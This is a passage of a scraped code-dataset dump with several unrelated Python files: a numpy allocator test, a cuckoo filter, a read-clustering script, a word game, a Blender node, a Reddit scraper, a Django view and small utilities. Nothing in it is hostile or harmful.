elsize)\n if result:\n result = std.memset(result, 0, nelem * elsize)\n return result\n\n def _malloc_(self, size):\n return std.memalign(self.alignment, size)\n\n def _realloc_(self, ptr, new_size):\n result = std.realloc(ptr, new_size)\n if result and result % self.alignment != 0:\n tmp = result\n result = std.memalign(self.alignment, new_size)\n if result:\n result = std.memcpy(result, tmp, new_size)\n std.free(tmp)\n return result\n\n\ndef main():\n from mmap import PAGESIZE\n import numpy as np\n\n with aligned_allocator(PAGESIZE) as page_aligned_allocator:\n print(page_aligned_allocator)\n\n np.core.test()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"inaccel/numpy-allocator","sub_path":"test/aligned_allocator.py","file_name":"aligned_allocator.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"38400743941","text":"from contentbase.auditor import (\n AuditFailure,\n audit_checker,\n)\n\n\n@audit_checker('replicate', frame='object')\ndef audit_rep_extra_items(value, system):\n '''\n A replicate should no longer have platforms, read_length, paired_end\n Should be in the schema.\n '''\n\n for item in ['platform', 'read_length', 'paired_ended']:\n\n if item in value:\n detail = 'Replicate {} has a item {}'.format(\n value['@id'],\n value[item] # ['name']\n )\n error_message = 'replicate with {}'.format(item)\n raise AuditFailure(error_message, detail, level='DCC_ACTION')\n\n\n@audit_checker('replicate', frame=['experiment'])\ndef audit_status_replicate(value, system):\n '''\n As the experiment-replicate relationship is reverse calculated, the status checker for item\n is not sufficient to catch all cases of status mismatch between replicates and experiments.\n * in-progress replicate can't have experiment in [proposed, released, deleted, revoked]\n * released or revoked replicate must be in [released or revoked]\n * if experiment is deleted, replicate must be deleted\n '''\n\n rep_status = value['status']\n exp_status = value['experiment']['status']\n\n if ((rep_status in ['in progress'] and exp_status in ['released', 'revoked', 'proposed', 'preliminary']) or\n (rep_status in ['released', 'revoked'] and exp_status not in ['released', 'revoked']) or\n (exp_status in ['deleted'] and rep_status not in ['deleted'])):\n # If any of the three cases exist, there is an error\n detail = '{} replicate {} is in {} experiment'.format(\n rep_status,\n value['@id'],\n exp_status\n )\n raise AuditFailure('mismatched status', detail, level='DCC_ACTION')\n","repo_name":"ClinGen/clincoded","sub_path":"src/clincoded/audit/replicate.py","file_name":"replicate.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"38075130325","text":"import random\nimport bucket\nimport exceptions\nimport hashutils\n\nclass CuckooFilter(object):\n \"\"\"\n 布谷鸟哈希表类.\n\n Implements insert, delete and contains operations for the filter.\n \"\"\"\n\n def __init__(self, capacity, bucket_size=4, fingerprint_size=1,\n max_displacements=500):\n \"\"\"\n Initialize CuckooFilter object.\n\n :param capacity: Size of the Cuckoo Filter\n :param bucket_size: Number of entries in a bucket\n :param fingerprint_size: Fingerprint size in bytes\n :param max_displacements: Maximum number of evictions before filter is\n considered full\n \"\"\"\n self.capacity = capacity\n self.bucket_size = bucket_size\n self.fingerprint_size = fingerprint_size\n self.max_displacements = max_displacements\n self.buckets = [bucket.Bucket(size=bucket_size)\n for _ in range(self.capacity)]\n self.size = 0\n\n def __repr__(self):\n return '<CuckooFilter: capacity=' + str(self.capacity) + \\\n ', size=' + str(self.size) + ', fingerprint size=' + \\\n str(self.fingerprint_size) + ' byte(s)>'\n\n def __len__(self):\n return self.size\n\n def __contains__(self, item):\n return self.contains(item)\n\n def _get_index(self, item):\n \"\"\"\n 此item为列表:[项目,es_id]\n \"\"\"\n index = hashutils.hash_code(item[0]) % self.capacity\n return index\n\n def _get_alternate_index(self, index, fingerprint):\n alt_index = (index ^ hashutils.hash_code(fingerprint)) % self.capacity\n return alt_index\n\n def insert(self, item):\n \"\"\"\n Insert an item into the filter.\n 插入的时候,item为[项目,es_id]\n\n :param item: Item to be inserted.\n :return: True if insert is successful; CuckooFilterFullException if\n filter is full.\n \"\"\"\n fingerprint = hashutils.fingerprint(item[0], self.fingerprint_size)\n i = self._get_index(item)\n j = self._get_alternate_index(i, fingerprint)\n\n if self.buckets[i].insert([fingerprint,item[1]]):\n self.size += 1\n # print(\"插入到了i:\"+str(i))\n return True\n elif self.buckets[j].insert([fingerprint,item[1]]):\n self.size += 1\n # print(\"插入到了j:\"+str(j))\n return True\n\n\n for _ in range(self.max_displacements):\n eviction_index = random.choice([i, j])\n f = self.buckets[eviction_index].swap([fingerprint,item[1]])\n eviction_index_1 = self._get_alternate_index(eviction_index, f[0])\n if self.buckets[eviction_index_1].insert(f):\n self.size += 1\n return True\n\n # Filter is full\n raise exceptions.CuckooFilterFullException('Insert operation failed. '\n 'Filter is full.')\n\n def contains(self, item):\n \"\"\"\n Check if the filter contains the item.\n 此item为[项目,0]\n :param item: Item to check its presence in the filter.\n :return: 如果在cuckoo中,返回其存储的es_id,若不在,则返回False\n \"\"\"\n\n fingerprint = hashutils.fingerprint(item[0], self.fingerprint_size)\n i = self._get_index(item)\n j = self._get_alternate_index(i, fingerprint)\n # print('bucket before:'+str(self.buckets[i].bucket))\n list_i = []\n list_j = []\n for _ in range(len(self.buckets[i].bucket)):\n # print('length:'+str(len(self.buckets[i])))\n # print(self.buckets[i].bucket[_][0])\n list_i.append(self.buckets[i].bucket[_][0])\n for _ in range(len(self.buckets[j].bucket)):\n # print('length:'+str(len(self.buckets[j])))\n list_j.append(self.buckets[j].bucket[_][0])\n # print(list_i)\n # print(list_j)\n if fingerprint in list_i:\n # print(fingerprint)\n # print('index:' + str(list_i.index(fingerprint)))\n # print('bucket after:'+str(self.buckets[i].bucket))\n return self.buckets[i].bucket[list_i.index(fingerprint)][-1]\n elif fingerprint in list_j:\n # print(self.buckets[j].bucket)\n return self.buckets[j].bucket[list_j.index(fingerprint)][-1]\n else:\n return False\n\n def delete(self, item):\n \"\"\"\n Delete an item from the filter.\n\n To delete an item safely, it must have been previously inserted.\n Otherwise, deleting a non-inserted item might unintentionally remove\n a real, different item that happens to share the same fingerprint.\n 此item为列表:[项目,es_id]\n :param item: Item to delete from the filter.\n :return: True, if item is found and deleted; False, otherwise.\n \"\"\"\n fingerprint = hashutils.fingerprint(item[0], size=self.fingerprint_size)\n i = self._get_index(item)\n j = self._get_alternate_index(i, fingerprint)\n if self.buckets[i].delete([fingerprint,item[1]]) \\\n or self.buckets[j].delete([fingerprint,item[1]]):\n self.size -= 1\n return True\n return False\n\n\n","repo_name":"Oathkeeper-ljs/biyesheji","sub_path":"cuckoofilter.py","file_name":"cuckoofilter.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30933774818","text":"import os\nimport h5py\nimport logging\nimport my_dtw\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom constants import data_path, workplace_path, prefix_length\nfrom sklearn.cluster import SpectralClustering\nfrom sklearn.manifold import SpectralEmbedding\nfrom sklearn import mixture\nfrom sklearn.metrics import silhouette_score\nfrom my_scoring import ScoringScheme\nfrom visualization import plot_embedding, plot_scores\nfrom util import *\n\nnp.random.seed(1)\n\n\ndef load_training_data(filename):\n reads = []\n key_to_index = []\n with open(os.path.join(data_path, filename+'.txt'), 'r') as f:\n N, _ = list(map(int, f.readline().split()))\n for i in range(N):\n key = f.readline()\n key_to_index.append(key)\n reads.append(list(map(float, f.readline().split())))\n\n D = np.zeros((N, N))\n frontiers = [[] for i in range(N)]\n index_to_key = {}\n with open(os.path.join(data_path, filename+'_out_idx.csv'), 'r') as f:\n f.readline()\n for i in range(N):\n index_to_key[i] = f.readline()\n for j in range(N-1):\n frontiers[i].append(list(map(int, f.readline().split())))\n row = list(map(float, f.readline().split(',')))\n for j in range(N):\n D[i, j] = D[j, i] = row[j]\n\n return reads, D, key_to_index, index_to_key, reads, frontiers\n\n\ndef get_inverse_permutation(labels_true, labels_pred):\n N = np.max(labels_true + 1)\n inverse_permutation = [-1]*N\n for i in range(N):\n majority = np.argmax(np.bincount(labels_pred[labels_true == i]))\n inverse_permutation[majority] = i\n return inverse_permutation\n\n\ndef depermutate_lables(labels_true, labels_pred):\n inverse_permutation = get_inverse_permutation(labels_true, labels_pred)\n for i in range(len(labels_pred)):\n labels_pred[i] = inverse_permutation[labels_pred[i]]\n return labels_pred\n\n\ndef get_representants(distances, labels_true, k, num_representatives):\n \"\"\"\n\n :param distances: matrix of pairwise DTW scores\n :param labels_true:\n :param k: number of clusters\n :param num_representatives: the number of representatives from each cluster\n :return: list of lists of representatives for each cluster\n \"\"\"\n distances = np.exp(-distances/(2*distances.std()))\n distances = distances.max() - distances\n clustering = SpectralClustering(n_clusters=k,\n assign_labels=\"discretize\",\n affinity='precomputed',\n random_state=0,\n n_jobs=4).fit(distances)\n\n print(clustering.labels_)\n labels = depermutate_lables(labels_true, clustering.labels_)\n print(labels)\n cluster_list = [(np.argwhere(labels == i)).flatten() for i in range(k)]\n cluster_sizes = [len(x) for x in cluster_list]\n\n \"\"\"\n for each cluster pick the representatives with most discriminative power, that is, the ones with\n maximal inside_barcode_mean/outside_barcode_mean scores\n \"\"\"\n representatives = []\n for cluster in range(k):\n discriminative_scores = []\n for cluster_member in cluster_list[cluster]:\n within_cluster_score = np.mean([distances[cluster_member, x] for x in cluster_list[cluster]\n if cluster_member != x])\n cross_cluster_score = np.mean([distances[cluster_member, x]\n for other_cluster in range(k) if cluster != other_cluster\n for x in cluster_list[other_cluster]])\n\n discriminative_scores.append(within_cluster_score/cross_cluster_score)\n\n discriminative_scores = sorted(enumerate(discriminative_scores), key=lambda x: x[1], reverse=True)\n #np.random.shuffle(discriminative_scores)\n # select 1/3 of the representatives greedily, the rest randomly\n selected_random = 0\n selected_greedy = num_representatives - selected_random\n cluster_representatives = []\n # greedy selection\n for i in range(cluster_sizes[cluster] if num_representatives == -1 else selected_greedy):\n id_in_cluster = discriminative_scores[i][0]\n cluster_representatives.append(cluster_list[cluster][id_in_cluster])\n # random selection\n for i in np.random.choice(selected_greedy + np.arange(len(discriminative_scores)-selected_greedy),\n selected_random, replace=False):\n id_in_cluster = discriminative_scores[i][0]\n cluster_representatives.append(cluster_list[cluster][id_in_cluster])\n\n representatives.append(cluster_representatives)\n\n return representatives, labels, clustering.affinity_matrix_\n\n\ndef get_true_label(labels_true, labels_pred, x):\n N = np.max(labels_true + 1)\n inverse_permutation = [-1]*N\n for i in range(N):\n majority = np.argmax(np.bincount(labels_pred[labels_true == i]))\n inverse_permutation[majority] = i\n\n return inverse_permutation[x]\n\n\ndef make_validation_input(filename, representatives):\n with h5py.File(os.path.join(data_path, 'validation_dataset_big.hdf5'), 'r') as f_validation:\n print(len(list(f_validation.keys())))\n with open(os.path.join(data_path, filename+'_cluster.in'), 'w') as of:\n of.write('{} {}\\n'.format(4, len(representatives[0])))\n for i in range(4):\n for j in range(len(representatives[i])):\n starts = [x[0] for x in frontiers[representatives[i][j]]]\n ends = [x[1] for x in frontiers[representatives[i][j]]]\n qstart = int(np.quantile(starts, 0.05))\n qend = int(np.quantile(ends, 0.95))\n print(qstart, qend)\n of.write(str(qend-qstart) + '\\n')\n of.write(' '.join(str(x) for x in reads[representatives[i][j]][qstart:qend]) + '\\n')\n\n names = []\n barcodes = []\n with open(os.path.join(workplace_path, 'all2_filtered.txt'), 'r') as all:\n lines = all.readlines()\n for line in lines:\n name, barcode = line.split()\n names.append(name)\n barcodes.append(barcode)\n\n #of.write(str(len(list(f_validation.keys()))) + '\\n')\n for i in range(len(names)):\n if names[i] not in f_validation: continue\n print(names[i])\n signal = z_normalize(trim_blank(np.array(f_validation[names[i]]).astype(float)))[:prefix_length]\n of.write('{} {}\\n'.format(names[i], barcodes[i]))\n of.write(' '.join(str(x) for x in signal) + '\\n')\n\n\ndef get_scores(filename):\n with open(os.path.join(data_path, filename)) as f:\n N, r = map(int, f.readline().split())\n names = []\n labels = []\n scores = []\n X = []\n for i in range(N):\n line = list(f.readline().split())\n # if len(line) == 1: name = line[0]\n if len(line) == 1: break\n name, label = line[0], int(line[1])\n names.append(name)\n labels.append(label)\n rating = list(map(float, f.readline().split(',')))\n scores.append(rating)\n X.append(np.argmax([\n np.mean(sorted(rating[i * r: (i + 1) * r])) for i in range(4)\n ]))\n\n X = np.array(X)\n labels = np.array(labels)\n scores = np.array(scores)\n return X, labels, scores\n\n\ndef get_label_gmm(D, k, labels_true):\n embedding = SpectralEmbedding(n_components=2, affinity='precomputed').fit_transform(D)\n gmm = mixture.GaussianMixture(n_components=k, covariance_type='full', tol=0.0001, n_init=50)\n gmm.fit(embedding)\n probs = gmm.predict_proba(embedding)\n labels_pred = np.array([np.argmax(probs[i]) for i in range(len(probs)-1)])\n corrected_labels = np.array(get_inverse_permutation(labels_true, labels_pred))\n ans = corrected_labels[np.argmax(probs[-1])]\n #plt.plot(probs[-1])\n #plt.show()\n scores_sorted = sorted(probs[-1], reverse=True)\n if scores_sorted[0] - scores_sorted[1] < 0.6:\n ans = -2\n return ans, embedding\n\n\ndef get_label_spectral(D, k, labels_true):\n clustering = SpectralClustering(n_clusters=k,\n assign_labels='discretize',\n affinity='precomputed',\n random_state=0,\n n_init=10,\n n_jobs=4).fit(D)\n labels_pred = clustering.labels_[:-1]\n inverse_permutation = get_inverse_permutation(labels_true, labels_pred)\n ans = inverse_permutation[clustering.labels_[-1]]\n return ans\n\n\ndef validate(D, representatives, scores):\n D_small = D[np.array(representatives).flatten(), :][:, np.array(representatives).flatten()]\n main_mean = np.mean([D_small[i, i] for i in range(len(D_small))])\n predictions = []\n for i in range(len(scores)):\n print(i)\n D_ = np.zeros((D_small.shape[0] + 1, D_small.shape[1] + 1))\n D_[:-1, :-1] = D_small\n D_[-1, :-1] = scores[i]\n D_[:-1, -1] = scores[i]\n D_[-1, -1] = main_mean\n D_ = np.exp(-D_ / (2*np.std(D_)))\n D_ = D_.max() - D_\n #plt.imshow(D_)\n #plt.show()\n labels_true = np.array([len(representatives[0]) * [i] for i in range(4)]).flatten()\n ans = get_label_spectral(D_, 4, labels_true)\n predictions.append(ans)\n #plot_scores(scores[i], ans, labels[i])\n #plot_embedding(embedding, 4, ans+1, labels[i])\n\n return D_small, predictions\n\n\ndef purify_frontiers(labels, frontiers):\n N = len(labels)\n new_frontiers = [[] for i in range(N)]\n for i in range(np.max(labels)+1):\n cluster_indices = np.argwhere(labels == i).flatten()\n for j in cluster_indices:\n for x in frontiers[j]:\n if x[0] in cluster_indices:\n new_frontiers[j].append(x[1:])\n return new_frontiers\n\n\ndef representatives_selector(D, num_representatives, cluster_sizes, n_iters=10):\n \"\"\"\n Try many random selections of representatives and validate them on the remainder of the reads.\n :param D: distance matrix\n :param num_representatives: the number of demanded representatives\n :param cluster_sizes: a list of\n :param n_iters: the number of random selections performed\n :return: the best selection of representatives\n \"\"\"\n N = len(cluster_sizes)\n for iteration in range(n_iters):\n candidates_idx = np.array([\n np.random.choice(cluster_sizes[i], num_representatives) for i in range(N)\n ]).flatten()\n scores = []\n for i in range(len(D)):\n if i not in candidates_idx:\n scores.append(D[i, candidates_idx])\n D_ = D[candidates_idx,:][:, candidates_idx]\n _, pred = validate(D_, candidates_idx, scores)\n\n\ndef correctness(pred, labels):\n pred = np.array(pred)\n labels = np.array(labels)\n return np.sum(pred == labels)/len(pred)*100\n\n\ndef correctness_summary(pred, labels):\n assert len(pred) == len(labels)\n pred = np.array(pred)\n complete_accuracy = correctness(pred, labels)\n pred_, labels_ = [], []\n for i in range(len(pred)):\n if pred[i] != -1:\n pred_.append(pred[i])\n labels_.append(labels[i])\n labeled_accuracy = correctness(pred_, labels_)\n labeled_percentage = (len(pred_)/len(pred))*100\n print('{:20}:{:6} %'.format('Accuracy (complete)', complete_accuracy))\n print('{:20}:{:6} %'.format('Accuracy (labeled)', labeled_accuracy))\n print('{:20}:{:6} %'.format('Percentage of labeled', labeled_percentage))\n return complete_accuracy, labeled_accuracy, labeled_percentage\n\n\nfile = 'matrix_2000'\ncluster_sizes = [500]*4\nlabels_true = np.array([i for i in range(len(cluster_sizes)) for j in range(cluster_sizes[i])])\nreads, D, key_to_index, index_to_key, reads, frontiers = load_training_data(file)\nrepresentatives, labels_pred, affinity = get_representants(D, labels_true, 4, 20)\nlabels_pred = depermutate_lables(labels_true, labels_pred)\nfrontiers = purify_frontiers(labels_pred, frontiers)\nmake_validation_input('matrix_2000', representatives)\n\n#X, labels, scores = get_scores(file+'_cluster.out')\n#for i in range(len(labels)):\n# if labels[i] == 2:\n# labels[i] = 3\n# elif labels[i] == 3:\n# labels[i] = 2\n\n#D_, predictions = validate(D, representatives, scores)\n#print(correctness(predictions, labels))\n","repo_name":"Gogis0/barcluster","sub_path":"linear_aligner.py","file_name":"linear_aligner.py","file_ext":"py","file_size_in_byte":12626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7334789362","text":"import random\n\n__author__ = 'm'\n########################\n# Игра \"Анаграммы 2.0\" #\n########################\n\nprint(\"\"\"\n########################\n# Игра \"Анаграммы 2.0\" #\n########################\n\"\"\")\n\nprint(\"\"\"\nПравила игры:\n1. Вам будет предложен набор букв\n2. Из этого набора букв Вы должны собрать слово\n3. У Вас есть возможность получить подсказку:\n 1) Для этого введите '50'\n 2) В случае исползования подсказки вы получите в двое меньше очков\n4. Правила начисления очков:\n 1) Если Вы отгадаете слово с первой попытки получите 100 очков\n 2) Если со второй - 80\n 3) Если с третьей - 60 и т.д.\n5. Для выхода без ответа введите пустую строку\n\"\"\")\n\nWORDS = (\n \"автопоезд\",\n \"локамотив\",\n \"программирование\",\n \"алгоритм\",\n \"лунопарк\"\n)\n\nword = random.choice(WORDS)\ncorrect = word\njumble = \"\"\nscore = 100\nuse_prompt = False\n\nwhile word:\n position = random.randrange(len(word))\n jumble += word[position]\n word = word[:position] + word[position + 1:]\n\nprint(\"Отгадайте слово\\n\" + jumble)\n\nguess = input(\"\\nВедите Ваш ответ: \")\nwhile guess != correct and guess != \"\":\n if (guess == \"50\"):\n if (use_prompt):\n print(\"Вы уже один раз использовали подсказку.\")\n else:\n print(\"Вы использовали подсказку: \" + correct[:len(correct)//2])\n print(\"Ваши очки уменьшились в два раза\")\n score //= 2\n use_prompt = True\n else:\n print(\"Ответ неверный. \")\n if score - 10 > 0:\n print(\"Вы потеряли 10 очков.\")\n score -= 10\n else:\n print(\"Вам уже нечего терять!\")\n score = 0\n guess = input(\"Попробуйте еще раз: \")\n\nif guess == correct:\n print(\"Поздравляю! Вы отгадали слово заработали \" + str(score) + \" очков.\")\n\nif guess == \"\":\n print(\"А слово было простое: \" + correct, end=\".\\n\")\n","repo_name":"MaxMoto1702/study-python","sub_path":"ch4/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37777479140","text":"import bpy\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom bpy.props import BoolProperty;\n\n# pylint: disable=w0613\n# pylint: disable=c0111\n# pylint: disable=c0103\n\n\nclass SvCollectionPicker(SverchCustomTreeNode, bpy.types.Node):\n\n \"\"\"\n Triggers: SvCollectionPicker\n Tooltip:\n\n A short description for reader of node code\n \"\"\"\n\n bl_idname = 'SvCollectionPicker'\n bl_label = 'Collection Picker'\n bl_icon = 'GROUP'\n is_scene_dependent = True\n is_animation_dependent = True\n\n def find_collections(self, object):\n return True\n\n collection: bpy.props.PointerProperty(\n name=\"collection name\", poll=find_collections, type=bpy.types.Collection, update=updateNode)\n\n sort_object: BoolProperty(\n name=\"Sort Objects\", description=\"Sort objects by name\",\n default=True, update=updateNode)\n\n show_all_objects: bpy.props.BoolProperty(\n name=\"Show All Objects\", description=\"Show all objects in the hierarchy of collections\",\n default=False, update=updateNode)\n\n show_only_visible: bpy.props.BoolProperty(\n name=\"Show Only Visible\", description=\"Show only the visible objects\",\n default=False, update=updateNode)\n\n def sv_init(self, context):\n self.outputs.new(\"SvObjectSocket\", \"Objects\")\n\n def sv_draw_buttons(self, context, layout):\n col = layout.column()\n col.prop_search(self, 'collection', bpy.data, 'collections', text='', icon='GROUP')\n layout.prop(self, \"show_all_objects\")\n layout.prop(self, \"show_only_visible\")\n layout.prop(self, \"sort_object\");\n\n def process(self):\n\n found_objects = []\n if self.collection:\n if self.show_all_objects:\n found_objects = bpy.data.collections[self.collection.name].all_objects[:] or []\n else:\n found_objects = self.collection.objects[:] or []\n\n if self.show_only_visible:\n found_objects = [obj for obj in found_objects if obj.visible_get()]\n\n if self.sort_object:\n items = [(obj.name, obj) for obj in found_objects]\n items = sorted(items, key=lambda x: x[0], reverse=False)\n found_objects = [item[1] for item in items]\n\n self.outputs['Objects'].sv_set(found_objects)\n\nclasses = [SvCollectionPicker]\nregister, unregister = bpy.utils.register_classes_factory(classes)\n\nif __name__ == '__main__':\n register()\n","repo_name":"nortikin/sverchok","sub_path":"nodes/scene/collection_picker_mk1.py","file_name":"collection_picker_mk1.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"8057379917","text":"import os\nimport praw\nimport csv\nfrom typing import List, Dict, Tuple\nimport argparse\nfrom .sentiment_analysis import analyze_sentiment\nfrom tqdm import tqdm\n\ndef create_reddit_instance():\n \"\"\"\n Create a Reddit API instance using environment variables for authentication.\n\n :return: A Reddit API instance.\n \"\"\"\n return praw.Reddit(\n client_id=os.environ[\"REDDIT_CLIENT_ID\"],\n client_secret=os.environ[\"REDDIT_CLIENT_SECRET\"],\n user_agent=\"reddit-scraper\",\n # username=os.environ[\"REDDIT_USERNAME\"],\n # password=os.environ[\"REDDIT_PASSWORD\"],\n )\n\ndef scrape_posts(reddit, subreddit_name: str, num_posts: int) -> List[Dict]:\n \"\"\"\n Scrape posts from a subreddit using the Reddit API.\n\n :param reddit: A Reddit API instance.\n :param subreddit_name: The name of the subreddit to scrape.\n :param num_posts: The number of posts to scrape.\n :return: A list of dictionaries containing post data.\n \"\"\"\n print(\"Scraping posts...\")\n subreddit = reddit.subreddit(subreddit_name)\n posts_data = []\n\n for post in tqdm(subreddit.hot(limit=num_posts), total=num_posts):\n post_data = {\n \"post_title\": post.title,\n \"post_id\": post.id,\n \"num_upvotes\": post.score,\n \"tags\": post.link_flair_text,\n \"post_content\": post.selftext,\n \"post_sentiment\": analyze_sentiment(post.selftext),\n }\n posts_data.append(post_data)\n\n return posts_data\n\ndef scrape_comments(reddit, post_ids: List[str], num_comments: int) -> List[Dict]:\n \"\"\"\n Scrape comments from a list of Reddit posts.\n\n :param reddit: A Reddit API instance.\n :param post_ids: A list of post IDs to scrape comments from.\n :param num_comments: The number of comments to scrape per post.\n :return: A list of dictionaries containing comment data.\n \"\"\"\n print(\"Scraping comments...\")\n comments_data = []\n\n for post_id in tqdm(post_ids, desc=\"Posts\"):\n post = reddit.submission(id=post_id)\n\n post.comments.replace_more(limit=None)\n for comment in tqdm(post.comments.list()[:num_comments], total=num_comments, desc=\"Comments\"):\n comment_data = {\n \"post_title\": post.title,\n \"post_id\": post_id,\n \"commenter_name\": comment.author.name,\n \"comment_body\": comment.body,\n \"num_upvotes\": comment.score,\n \"comment_sentiment\": analyze_sentiment(comment.body),\n }\n comments_data.append(comment_data)\n\n return comments_data\n\ndef export_to_csv(data: List[Dict], filename: str):\n \"\"\"\n Export a list of dictionaries to a CSV file.\n\n :param data: A list of dictionaries containing data to export.\n :param filename: The name of the CSV file to create.\n \"\"\"\n print(f\"Exporting data to {filename}...\")\n with open(filename, \"w\", newline=\"\", encoding=\"utf-8\") as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=data[0].keys())\n writer.writeheader()\n for row in data:\n writer.writerow(row)\n\ndef parse_args() -> Tuple[str, int, int]:\n \"\"\"\n Parse command-line arguments.\n\n :return: A tuple containing the subreddit name, number of posts, and number of comments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Reddit post and comment scraper.\")\n parser.add_argument(\"subreddit\", type=str, help=\"Subreddit name\")\n parser.add_argument(\"num_posts\", type=int, help=\"Number of posts to scrape\")\n parser.add_argument(\"num_comments\", type=int, help=\"Number of comments to scrape\")\n args = parser.parse_args()\n \n return args.subreddit, args.num_posts, args.num_comments\n\ndef gather_data(reddit, subreddit: str, num_posts: int, num_comments: int) -> Tuple[List[Dict], List[Dict]]:\n \"\"\"\n Gather post and comment data from a subreddit.\n\n :param reddit: A Reddit API instance.\n :param subreddit: The subreddit name to scrape.\n :param num_posts: The number of posts to scrape.\n :param num_comments: The number of comments to scrape per post.\n :return: A tuple containing lists of post and comment data dictionaries.\n \"\"\"\n posts = scrape_posts(reddit, subreddit, num_posts)\n comments = scrape_comments(reddit, [post[\"post_id\"] for post in posts], num_comments)\n return posts, comments\n\ndef export_data(posts: List[Dict], comments: List[Dict]):\n \"\"\"\n Export post and comment data to separate CSV files.\n\n :param posts: A list of dictionaries containing post data.\n :param comments: A list of dictionaries containing comment data.\n \"\"\"\n export_to_csv(posts, \"posts.csv\")\n export_to_csv(comments, \"comments.csv\")\n\ndef main():\n \"\"\"\n Main function for the Reddit post and comment scraper script.\n \"\"\"\n subreddit, num_posts, num_comments = parse_args()\n reddit = create_reddit_instance()\n posts, comments = gather_data(reddit, subreddit, num_posts, num_comments)\n export_data(posts, comments)\n print(\"Done.\")\n\ndef scrape_reddit(subreddit, num_posts, num_comments):\n reddit = create_reddit_instance()\n posts, comments = gather_data(reddit, subreddit, num_posts, num_comments)\n export_data(posts, comments)\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"TheAcademicsFieldGuideToWritingCode/Reddit-Scraper","sub_path":"academics_reddit_scraper/academics_reddit_scraper.py","file_name":"academics_reddit_scraper.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31910110315","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\n\ninstall_requires = [\n 'requests',\n]\n\n\ntests_requires = [\n 'responses',\n]\n\n\nsetup(\n name='python-freeipa',\n version='0.2.0',\n author='OpenNode Team',\n author_email='info@opennodecloud.com',\n url='http://waldur.com',\n description='Lightweight FreeIPA client',\n long_description=open('README.rst').read(),\n install_requires=install_requires,\n extras_require={\n 'tests': tests_requires,\n },\n package_dir={'': 'src'},\n packages=find_packages('src', exclude=['*.tests', '*.tests.*', 'tests.*', 'tests']),\n test_suite='python_freeipa.tests.suite',\n classifiers=(\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: System :: Systems Administration :: Authentication/Directory'\n )\n)\n","repo_name":"Epictek/python-freeipa","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"21168585114","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nfrom .models import Book\r\nfrom django.template.defaulttags import register\r\n\r\n@register.filter\r\ndef get_range(value):\r\n return range(value)\r\n\r\n@register.filter\r\ndef get_url(value):\r\n d = value.split(\"/\")\r\n dlink = \"https://drive.google.com/uc?id=\" + d[-2] + \"&export=download\"\r\n return dlink\r\n# Create your views here.\r\n\r\ndef main(request):\r\n books = Book.objects.all()\r\n year2 = ['تشريح رأس و عنق', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس سلوكي\",\"تشريح أطراف\", \"علم الجنين\", \"النسج\"]\r\n year3 = ['تشريح', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس\",\"انكليزي\"]\r\n year4 = ['تشريح', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس\",\"انكليزي\"]\r\n year5 = ['تشريح', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس\",\"انكليزي\"]\r\n year6 = []\r\n context = {\r\n 'books':books,\r\n 'year2':year2,\r\n 'year3':year3,\r\n 'year4':year4,\r\n 'year5':year5,\r\n 'year6':year6,\r\n }\r\n return render(request, 'main.html', context)\r\n\r\ndef lectures(request, year, subject):\r\n lecture = Book.objects.all().filter(year=year, subject=subject)\r\n context = {\r\n 'lectures': lecture,\r\n 'subject':subject,\r\n }\r\n return render(request, 'lectures.html', context)\r\n\r\n","repo_name":"mustafamordaa1/RBCs","sub_path":"archive/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2328562235","text":"# Write_a_function\n# Created by JKChang\n# 14/08/2018, 10:58\n# Tag:\n# Description: https://www.hackerrank.com/challenges/write-a-function/problem\n\n# In the Gregorian calendar three criteria must be taken into account to identify leap years:\n# The year can be evenly divided by 4, is a leap year, unless:\n# The year can be evenly divided by 100, it is NOT a leap year, unless:\n# The year is also evenly divisible by 400. Then it is a leap year.\n\n\ndef is_leap(year):\n leap = False\n if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\n leap = True\n\n return leap\n\n\nyear = int(input())\nprint(is_leap(year))\n","repo_name":"JKChang2015/HackerRank","sub_path":"HackerP/introduction/Write_a_function.py","file_name":"Write_a_function.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19656646462","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torch.nn.functional as F\nimport 